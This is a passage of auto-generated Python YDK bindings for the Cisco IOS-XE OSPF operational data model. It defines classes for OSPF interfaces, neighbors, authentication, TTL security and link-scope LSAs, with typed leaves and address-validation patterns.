('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])),
('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])),
('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])),
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('state', (YLeaf(YType.str, 'state'), ['str'])),
('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.name = None
self.network_type = None
self.passive = None
self.demand_circuit = None
self.node_flag = None
self.cost = None
self.hello_interval = None
self.dead_interval = None
self.retransmit_interval = None
self.transmit_delay = None
self.mtu_ignore = None
self.lls = None
self.prefix_suppression = None
self.bfd = None
self.enable = None
self.state = None
self.hello_timer = None
self.wait_timer = None
self.dr = None
self.bdr = None
self.priority = None
self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea()
self.multi_area.parent = self
self._children_name_map["multi_area"] = "multi-area"
self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute()
self.fast_reroute.parent = self
self._children_name_map["fast_reroute"] = "fast-reroute"
self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity()
self.ttl_security.parent = self
self._children_name_map["ttl_security"] = "ttl-security"
self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication()
self.authentication.parent = self
self._children_name_map["authentication"] = "authentication"
self.static_neighbor = YList(self)
self.ospf_neighbor = YList(self)
self.intf_link_scope_lsas = YList(self)
self.intf_multi_topology = YList(self)
self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value)
class MultiArea(Entity):
"""
Multi Area
.. attribute:: multi_area_id
Multi\-area ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cost
Interface cost for multi\-area
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__()
self.yang_name = "multi-area"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
])
self.multi_area_id = None
self.cost = None
self._segment_path = lambda: "multi-area"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value)
class StaticNeighbor(Entity):
"""
Staticly configured neighbors
.. attribute:: address (key)
Neighbor IP address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: cost
Neighbor cost
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: poll_interval
Neighbor polling intervali in seconds
**type**\: int
**range:** 0..65535
**config**\: False
**units**\: seconds
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__()
self.yang_name = "static-neighbor"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['address']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', (YLeaf(YType.str, 'address'), ['str','str'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])),
])
self.address = None
self.cost = None
self.poll_interval = None
self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value)
class FastReroute(Entity):
"""
Fast reroute config
.. attribute:: candidate_disabled
Prevent the interface to be used as backup
**type**\: bool
**config**\: False
.. attribute:: enabled
Activates LFA. This model assumes activation of per\-prefix LFA
**type**\: bool
**config**\: False
.. attribute:: remote_lfa_enabled
Activates remote LFA
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__()
self.yang_name = "fast-reroute"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])),
('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])),
])
self.candidate_disabled = None
self.enabled = None
self.remote_lfa_enabled = None
self._segment_path = lambda: "fast-reroute"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value)
class TtlSecurity(Entity):
"""
TTL security
.. attribute:: enabled
Enable/Disable TTL security check
**type**\: bool
**config**\: False
.. attribute:: hops
Maximum number of hops that a OSPF packet may have traveled
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__()
self.yang_name = "ttl-security"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
('hops', (YLeaf(YType.uint8, 'hops'), ['int'])),
])
self.enabled = None
self.hops = None
self._segment_path = lambda: "ttl-security"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value)
class Authentication(Entity):
"""
Authentication configuration
.. attribute:: sa
SA name
**type**\: str
**config**\: False
.. attribute:: key_chain
key\-chain name
**type**\: str
**config**\: False
.. attribute:: key_string
Key string in ASCII format
**type**\: str
**config**\: False
.. attribute:: crypto_algorithm_val
Crypto algorithm
**type**\: :py:class:`CryptoAlgorithmVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal>`
**config**\: False
.. attribute:: no_auth
No authentication enabled
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__()
self.yang_name = "authentication"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))])
self._leafs = OrderedDict([
('sa', (YLeaf(YType.str, 'sa'), ['str'])),
('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])),
('key_string', (YLeaf(YType.str, 'key-string'), ['str'])),
('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
])
self.sa = None
self.key_chain = None
self.key_string = None
self.no_auth = None
self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal()
self.crypto_algorithm_val.parent = self
self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val"
self._segment_path = lambda: "authentication"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value)
class CryptoAlgorithmVal(Entity):
"""
Crypto algorithm
.. attribute:: hmac_sha1_12
HMAC\-SHA1\-12 algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: hmac_sha1_20
HMAC\-SHA1\-20 algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: md5
MD5 algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: sha_1
SHA\-1 algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: hmac_sha_1
HMAC\-SHA\-1 authentication algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: hmac_sha_256
HMAC\-SHA\-256 authentication algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: hmac_sha_384
HMAC\-SHA\-384 authentication algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
.. attribute:: hmac_sha_512
HMAC\-SHA\-512 authentication algorithm
**type**\: :py:class:`Empty<ydk.types.Empty>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__()
self.yang_name = "crypto-algorithm-val"
self.yang_parent_name = "authentication"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])),
('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])),
('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])),
('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])),
('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])),
('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])),
('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])),
('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])),
])
self.hmac_sha1_12 = None
self.hmac_sha1_20 = None
self.md5 = None
self.sha_1 = None
self.hmac_sha_1 = None
self.hmac_sha_256 = None
self.hmac_sha_384 = None
self.hmac_sha_512 = None
self._segment_path = lambda: "crypto-algorithm-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value)
class OspfNeighbor(Entity):
"""
List of OSPF neighbors
.. attribute:: neighbor_id (key)
OSPF neighbor ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: dr
Designated Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bdr
Backup Designated Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state
OSPF neighbor state
**type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>`
**config**\: False
.. attribute:: stats
Per\-neighbor statistics
**type**\: :py:class:`Stats <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__()
self.yang_name = "ospf-neighbor"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['neighbor_id']
self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))])
self._leafs = OrderedDict([
('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])),
('address', (YLeaf(YType.str, 'address'), ['str','str'])),
('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
])
self.neighbor_id = None
self.address = None
self.dr = None
self.bdr = None
self.state = None
self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats()
self.stats.parent = self
self._children_name_map["stats"] = "stats"
self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value)
class Stats(Entity):
"""
Per\-neighbor statistics
.. attribute:: nbr_event_count
The number of time this neighbor has changed state or an error has occurred
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: nbr_retrans_qlen
The current length of the retransmission queue
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__()
self.yang_name = "stats"
self.yang_parent_name = "ospf-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])),
('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])),
])
self.nbr_event_count = None
self.nbr_retrans_qlen = None
self._segment_path = lambda: "stats"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value)
class IntfLinkScopeLsas(Entity):
"""
List OSPF link scope LSAs
.. attribute:: lsa_type (key)
OSPF link scope LSA type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_scope_lsa
List of OSPF link scope LSAs
**type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa>`
**config**\: False
.. attribute:: area_scope_lsa
List OSPF area scope LSA databases
**type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__()
self.yang_name = "intf-link-scope-lsas"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type']
self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
])
self.lsa_type = None
self.link_scope_lsa = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value)
class LinkScopeLsa(Entity):
"""
List of OSPF link scope LSAs
.. attribute:: lsa_id (key)
LSA ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: version
Version
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
OSPFv2 LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv2_unknown_tlv
OSPFv2 Unknown TLV
**type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>`
**config**\: False
.. attribute:: ospfv3_lsa_val
OSPFv3 LSA
**type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix_list
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>`
**config**\: False
.. attribute:: multi_topology
OSPF multi\-topology interface augmentation
**type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology>`
**config**\: False
.. attribute:: router_address
Router address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: tlv
Link TLV
**type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv>`
**config**\: False
.. attribute:: unknown_sub_tlv
OSPFv2 Unknown sub TLV
**type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__()
self.yang_name = "link-scope-lsa"
self.yang_parent_name = "intf-link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_id','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
